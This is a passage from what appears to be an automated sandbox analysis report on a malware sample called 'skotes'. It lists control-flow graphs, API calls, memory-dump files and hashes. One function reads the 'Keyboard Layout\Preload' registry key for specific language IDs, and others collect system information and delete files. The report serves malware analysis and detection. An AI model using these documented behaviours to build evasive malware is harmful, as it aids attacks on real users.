dc80c0 call dc7a00 call db5c10 call dc7a00 * 5 1213->1220 1221 dc3ba2-dc3c67 call dc80c0 call dc7a00 call db5c10 call dc7a00 * 5 1213->1221 1222 dc3f42-dc3fa4 call dc7a00 * 4 call dc2f10 1213->1222 1215->1210 1216->1113 1216->1215 1217->1211 1218->1113 1218->1217 1219->1140 1303 dc3c6b-dc3c74 call dc7a00 1220->1303 1221->1303 1222->1140 1253->1192 1264 dc3b24-dc3b33 1253->1264 1259 dc3acb-dc3ad7 1254->1259 1260 dc3af7-dc3b16 1254->1260 1266 dc3aed-dc3af4 call dcd663 1259->1266 1267 dc3ad9-dc3ae7 1259->1267 1260->1253 1271 dc3b49-dc3b50 call dcd663 1264->1271 1272 dc3b35-dc3b43 1264->1272 1266->1260 1267->1116 1267->1266 1271->1192 1272->1116 1272->1271 1307 dc3c79-dc3c7d call dc08e0 1303->1307 1309 dc3c82-dc3c88 1307->1309 1309->1140
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                        • String ID: "$246122658369$5120$Fw==$Hykl$V2Te$WGpm$WTw=$WX f$invalid stoi argument$stoi argument out of range
                                                        • API String ID: 4078500453-1402436090
                                                        • Opcode ID: 595111159fbcfcb152b4083557d76fb01aba79a8f3216e1f7b8d7e73ef190dd4
                                                        • Instruction ID: a7cc44464fc4aa4d9fb6d239d525a6e787c21629eb4b8c6ec86f3817c84d507e
                                                        • Opcode Fuzzy Hash: 595111159fbcfcb152b4083557d76fb01aba79a8f3216e1f7b8d7e73ef190dd4
                                                        • Instruction Fuzzy Hash: F372F471A002899BDF18EF68CD46FDDBBB5EF45300F54859CE405A7282D7359B848BB2
                                                        Function 00DB5EE0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 340registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1715 db5ee0-db5fde RegOpenKeyExA 1720 db6008-db6015 call dccff1 1715->1720 1721 db5fe0-db5fec 1715->1721 1723 db5ffe-db6005 call dcd663 1721->1723 1724 db5fee-db5ffc 1721->1724 1723->1720 1724->1723 1726 db6016-db619d call de6c6a call dce150 call dc80c0 * 5 RegOpenKeyExA 1724->1726 1743 db61a3-db6233 call de40f0 1726->1743 1744 db64b1-db64ba 1726->1744 1770 db6239-db623d 1743->1770 1771 db649f-db64ab 1743->1771 1746 db64bc-db64c7 1744->1746 1747 db64e7-db64f0 1744->1747 1751 db64c9-db64d7 1746->1751 1752 db64dd-db64e4 call dcd663 1746->1752 1748 db651d-db6526 1747->1748 1749 db64f2-db64fd 1747->1749 1755 db6528-db6533 1748->1755 1756 db6553-db655c 1748->1756 1753 db64ff-db650d 1749->1753 1754 db6513-db651a call dcd663 1749->1754 1751->1752 1757 db65d7-db65df call de6c6a 1751->1757 1752->1747 1753->1754 1753->1757 1754->1748 1761 db6549-db6550 call dcd663 1755->1761 1762 db6535-db6543 1755->1762 1764 db655e-db6569 1756->1764 1765 db6585-db658e 1756->1765 1761->1756 1762->1757 1762->1761 1774 db657b-db6582 call dcd663 1764->1774 1775 db656b-db6579 1764->1775 1767 db65bb-db65d6 call dccff1 1765->1767 1768 db6590-db659f 1765->1768 1777 db65b1-db65b8 call dcd663 1768->1777 1778 db65a1-db65af 1768->1778 1780 db6499 1770->1780 1781 db6243-db6279 RegEnumValueA 1770->1781 1771->1744 1774->1765 1775->1757 1775->1774 1777->1767 1778->1757 1778->1777 1780->1771 1787 db627f-db629e 1781->1787 1788 db6486-db648d 1781->1788 1791 db62a0-db62a5 1787->1791 1788->1781 1789 db6493 1788->1789 1789->1780 1791->1791 1792 db62a7-db62fb call dc80c0 call dc7a00 * 2 call db5d50 1791->1792 1792->1788
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,?), ref: 00DB5F13
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                        • API String ID: 71445658-3963862150
                                                        • Opcode ID: f4950af069d5eb3299d49a0a4512d548d19d564b25f9c56863571afe4f8a546c
                                                        • Instruction ID: 61472bda4feef990d72b174c3c2f88127c81101eb91800542b513a4e070d8d7e
                                                        • Opcode Fuzzy Hash: f4950af069d5eb3299d49a0a4512d548d19d564b25f9c56863571afe4f8a546c
                                                        • Instruction Fuzzy Hash: 0DD1BE719002589BEB24DF64CC88BDEB7B9EF04300F5442D8E509E72D2DB749AA48FA5
                                                        Function 00DB7D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1800 db7d30-db7db2 call de40f0 1804 db7db8-db7de0 call dc7a00 call db5c10 1800->1804 1805 db8356-db8373 call dccff1 1800->1805 1812 db7de2 1804->1812 1813 db7de4-db7e06 call dc7a00 call db5c10 1804->1813 1812->1813 1818 db7e0a-db7e23 1813->1818 1819 db7e08 1813->1819 1822 db7e25-db7e34 1818->1822 1823 db7e54-db7e7f 1818->1823 1819->1818 1824 db7e4a-db7e51 call dcd663 1822->1824 1825 db7e36-db7e44 1822->1825 1826 db7e81-db7e90 1823->1826 1827 db7eb0-db7ed1 1823->1827 1824->1823 1825->1824 1828 db8374 call de6c6a 1825->1828 1830 db7e92-db7ea0 1826->1830 1831 db7ea6-db7ead call dcd663 1826->1831 1832 db7ed3-db7ed5 GetNativeSystemInfo 1827->1832 1833 db7ed7-db7edc 1827->1833 1841 db8379-db837f call de6c6a 1828->1841 1830->1828 1830->1831 1831->1827 1837 db7edd-db7ee6 1832->1837 1833->1837 1839 db7ee8-db7eef 1837->1839 1840 db7f04-db7f07 1837->1840 1843 db8351 1839->1843 1844 db7ef5-db7eff 1839->1844 1845 db7f0d-db7f16 1840->1845 1846 db82f7-db82fa 1840->1846 1843->1805 1848 db834c 1844->1848 1849 db7f29-db7f2c 1845->1849 1850 db7f18-db7f24 1845->1850 1846->1843 1851 db82fc-db8305 1846->1851 1848->1843 1853 db7f32-db7f39 1849->1853 1854 db82d4-db82d6 1849->1854 1850->1848 1855 db832c-db832f 1851->1855 1856 db8307-db830b 1851->1856 1859 db8019-db82bd call dc7a00 call db5c10 call dc7a00 call db5c10 call db5d50 call dc7a00 call db5c10 call db5730 call dc7a00 call db5c10 call dc7a00 call db5c10 call db5d50 call dc7a00 call db5c10 call db5730 call dc7a00 call db5c10 call dc7a00 call db5c10 call db5d50 call dc7a00 call db5c10 call db5730 call dc7a00 call db5c10 call dc7a00 call db5c10 call db5d50 call dc7a00 call db5c10 call db5730 1853->1859 1860 db7f3f-db7f9b call dc7a00 call db5c10 call dc7a00 call db5c10 call db5d50 1853->1860 1857 db82d8-db82e2 1854->1857 1858 db82e4-db82e7 1854->1858 1863 db833d-db8349 1855->1863 1864 db8331-db833b 1855->1864 1861 db830d-db8312 1856->1861 1862 db8320-db832a 1856->1862 1857->1848 1858->1843 1866 db82e9-db82f5 1858->1866 1900 db82c3-db82cc 1859->1900 1885 db7fa0-db7fa7 1860->1885 1861->1862 1868 db8314-db831e 1861->1868 1862->1843 1863->1848 1864->1843 1866->1848 1868->1843 1887 db7fab-db7fcb call de8bbe 1885->1887 1888 db7fa9 1885->1888 1894 db7fcd-db7fdc 1887->1894 1895 db8002-db8004 1887->1895 1888->1887 1897 db7fde-db7fec 1894->1897 1898 db7ff2-db7fff call dcd663 1894->1898 1899 db800a-db8014 1895->1899 1895->1900 1897->1841 1897->1898 1898->1895 1899->1900 1900->1846 1902 db82ce 1900->1902 1902->1854
                                                        APIs
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00DB7ED3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoNativeSystem
                                                        • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                        • API String ID: 1721193555-3123340372
                                                        • Opcode ID: 56365b59553d59bb6d101243edbbd99800260e18efb89c0e8ea3ee7da5ecf6db
                                                        • Instruction ID: c5a4751c7dc6d3c979861c8d25f6596267de91776a393d6ac454292aa5c76ea5
                                                        • Opcode Fuzzy Hash: 56365b59553d59bb6d101243edbbd99800260e18efb89c0e8ea3ee7da5ecf6db
                                                        • Instruction Fuzzy Hash: 78E1C370E00244DBDB15BB289C4B7DD7B62EB85710F94429CE417A73C2DB358E958BE2
                                                        Function 00DEB655 Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2133 deb655-deb665 DeleteFileW 2134 deb679-deb67c 2133->2134 2135 deb667-deb678 call de75c0 2133->2135
                                                        APIs
                                                        • DeleteFileW.KERNEL32(?,?,00DE6A97,?), ref: 00DEB65D
                                                        • __dosmaperr.LIBCMT ref: 00DEB66E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteFile__dosmaperr
                                                        • String ID:
                                                        • API String ID: 1911827773-0
                                                        • Opcode ID: dcb9f652ebecbd7ad7c985ff2beb618c2990955e37b975f94956a09e17099451
                                                        • Instruction ID: 7da1751101bdfcfa2a9671c4ecefdb55357c2735d152a6d99979b9febccd356c
                                                        • Opcode Fuzzy Hash: dcb9f652ebecbd7ad7c985ff2beb618c2990955e37b975f94956a09e17099451
                                                        • Instruction Fuzzy Hash: 98D0123129624936DA5035B7BC0941B378D8B813747342615B42C892D2FF22D8504471
                                                        Function 00DED634 Relevance: 1.7, APIs: 1, Instructions: 198COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2139 ded634-ded655 call dcdf80 2142 ded66f-ded672 2139->2142 2143 ded657 2139->2143 2144 ded68e-ded69a call dea7c8 2142->2144 2146 ded674-ded677 2142->2146 2143->2144 2145 ded659-ded65f 2143->2145 2156 ded69c-ded69f 2144->2156 2157 ded6a4-ded6b0 call ded5be 2144->2157 2147 ded683-ded68c call ded57c 2145->2147 2148 ded661-ded665 2145->2148 2146->2147 2149 ded679-ded67c 2146->2149 2164 ded6cc-ded6d5 2147->2164 2148->2144 2151 ded667-ded66b 2148->2151 2152 ded67e-ded681 2149->2152 2153 ded6b2-ded6c2 call de75f6 call de6c5a 2149->2153 2151->2153 2158 ded66d 2151->2158 2152->2147 2152->2153 2153->2156 2161 ded80b-ded81a 2156->2161 2157->2153 2169 ded6c4-ded6c9 2157->2169 2158->2147 2167 ded6d7-ded6df call de8dc8 2164->2167 2168 ded6e2-ded6f3 2164->2168 2167->2168 2172 ded709 2168->2172 2173 ded6f5-ded707 2168->2173 2169->2164 2174 ded70b-ded71c 2172->2174 2173->2174 2176 ded71e-ded720 2174->2176 2177 ded78a-ded79a call ded7c7 2174->2177 2179 ded81b-ded81d 2176->2179 2180 ded726-ded728 2176->2180 2186 ded79c-ded79e 2177->2186 2187 ded809 2177->2187 2184 ded81f-ded826 call de8e10 2179->2184 2185 ded827-ded83a call de65ed 2179->2185 2182 ded72a-ded72d 2180->2182 2183 ded734-ded740 2180->2183 2182->2183 2188 ded72f-ded732 2182->2188 2189 ded742-ded757 call ded62b * 2 2183->2189 2190 ded780-ded788 2183->2190 2184->2185 2203 ded83c-ded846 2185->2203 2204 ded848-ded84e 2185->2204 2193 ded7d9-ded7e2 2186->2193 2194 ded7a0-ded7b6 call dea671 2186->2194 2187->2161 2188->2183 2195 ded75a-ded75c 2188->2195 2189->2195 2190->2177 2214 ded7e5-ded7e8 2193->2214 2194->2214 2195->2190 2202 ded75e-ded76e 2195->2202 2208 ded770-ded775 2202->2208 2203->2204 2209 ded87c-ded887 call de75f6 2203->2209 2210 ded867-ded878 RtlAllocateHeap 2204->2210 2211 ded850-ded851 2204->2211 2208->2177 2213 ded777-ded77e 2208->2213 2223 ded889-ded88b 2209->2223 2216 ded87a 2210->2216 2217 ded853-ded85a call de9dc0 2210->2217 2211->2210 2213->2208 2220 ded7ea-ded7ed 2214->2220 2221 ded7f4-ded7fc 2214->2221 2216->2223 2217->2209 2229 ded85c-ded865 call de8e36 2217->2229 2220->2221 2224 ded7ef-ded7f2 2220->2224 2221->2187 2225 ded7fe-ded806 call dea671 2221->2225 2224->2187 2224->2221 2225->2187 2229->2209 2229->2210
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7283d8735f42682f05537cccc4fdee49a40f6a559a43c473112d47a9a9b22298
                                                        • Instruction ID: 56495a58b249dcbf4b0a4092aaacbf6123189b25925a3a5df70b519f2b7161e1
                                                        • Opcode Fuzzy Hash: 7283d8735f42682f05537cccc4fdee49a40f6a559a43c473112d47a9a9b22298
                                                        • Instruction Fuzzy Hash: 4661F432D002988FDF25BFAAD8856EDB7B2EF15310F2C4119E85967251DE319C44CB71
                                                        Function 00DB8380 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2233 db8380-db8401 call de40f0 2237 db840d-db8435 call dc7a00 call db5c10 2233->2237 2238 db8403-db8408 2233->2238 2246 db8439-db845b call dc7a00 call db5c10 2237->2246 2247 db8437 2237->2247 2239 db854f-db856b call dccff1 2238->2239 2252 db845f-db8478 2246->2252 2253 db845d 2246->2253 2247->2246 2256 db847a-db8489 2252->2256 2257 db84a9-db84d4 2252->2257 2253->2252 2258 db848b-db8499 2256->2258 2259 db849f-db84a6 call dcd663 2256->2259 2260 db8501-db8522 2257->2260 2261 db84d6-db84e5 2257->2261 2258->2259 2262 db856c-db8571 call de6c6a 2258->2262 2259->2257 2266 db8528-db852d 2260->2266 2267 db8524-db8526 GetNativeSystemInfo 2260->2267 2264 db84f7-db84fe call dcd663 2261->2264 2265 db84e7-db84f5 2261->2265 2264->2260 2265->2262 2265->2264 2271 db852e-db8535 2266->2271 2267->2271 2271->2239 2273 db8537-db853f 2271->2273 2276 db8548-db854b 2273->2276 2277 db8541-db8546 2273->2277 2276->2239 2278 db854d 2276->2278 2277->2239 2278->2239
                                                        APIs
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00DB8524
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoNativeSystem
                                                        • String ID:
                                                        • API String ID: 1721193555-0
                                                        • Opcode ID: 2478cd2722f78e6b86a975989f572964854a80f3ba9616e8fe6392852393f5af
                                                        • Instruction ID: 09118ce45b5e7344d294f6f47820edebd987a01e80e88d5e37b4afeab845c1b2
                                                        • Opcode Fuzzy Hash: 2478cd2722f78e6b86a975989f572964854a80f3ba9616e8fe6392852393f5af
                                                        • Instruction Fuzzy Hash: E6510770D00258DBDB24EB68CD49BDDBBB9DB45710F5442A8E40AA7281EF349A84CBB1
                                                        Function 00DED82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2370 ded82f-ded83a 2371 ded83c-ded846 2370->2371 2372 ded848-ded84e 2370->2372 2371->2372 2373 ded87c-ded887 call de75f6 2371->2373 2374 ded867-ded878 RtlAllocateHeap 2372->2374 2375 ded850-ded851 2372->2375 2381 ded889-ded88b 2373->2381 2376 ded87a 2374->2376 2377 ded853-ded85a call de9dc0 2374->2377 2375->2374 2376->2381 2377->2373 2383 ded85c-ded865 call de8e36 2377->2383 2383->2373 2383->2374
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00DEA72D,?,00000000,?,00DE6D2C,00DB7883,9EADD1CD,00DB7883), ref: 00DED871
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_db0000_skotes.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: cb8a33d101cdac4c6a1fcb6e3b6ca6a10618f5bb7ab7533ad4471d290cd0dbed
                                                        • Instruction ID: ee0911f864c410173df35d093ff12986626b4936054790851e1fa99b8f0181b9
                                                        • Opcode Fuzzy Hash: cb8a33d101cdac4c6a1fcb6e3b6ca6a10618f5bb7ab7533ad4471d290cd0dbed
                                                        • Instruction Fuzzy Hash: 69F0E2326012A466EB213A779C81A5B7B5ADF85770B5C8121EC08EB181DE31DC00D2F0
                                                        Function 00DEB04B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,9EADD1CD,?,?,00DCD3FC,9EADD1CD,?,00DC7A8B,?,?,?,?,?,?,00DB7465,?), ref: 00DEB07D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DB0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3756007668.0000000000DB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756294497.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3756945400.0000000000E19000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000E1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.000000000108F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010BB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3757207811.00000000010D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3767890839.00000000010D2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769279054.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3769407829.000000000127A000.00000080.00000001.01000000.00000007.sdmpDownload File
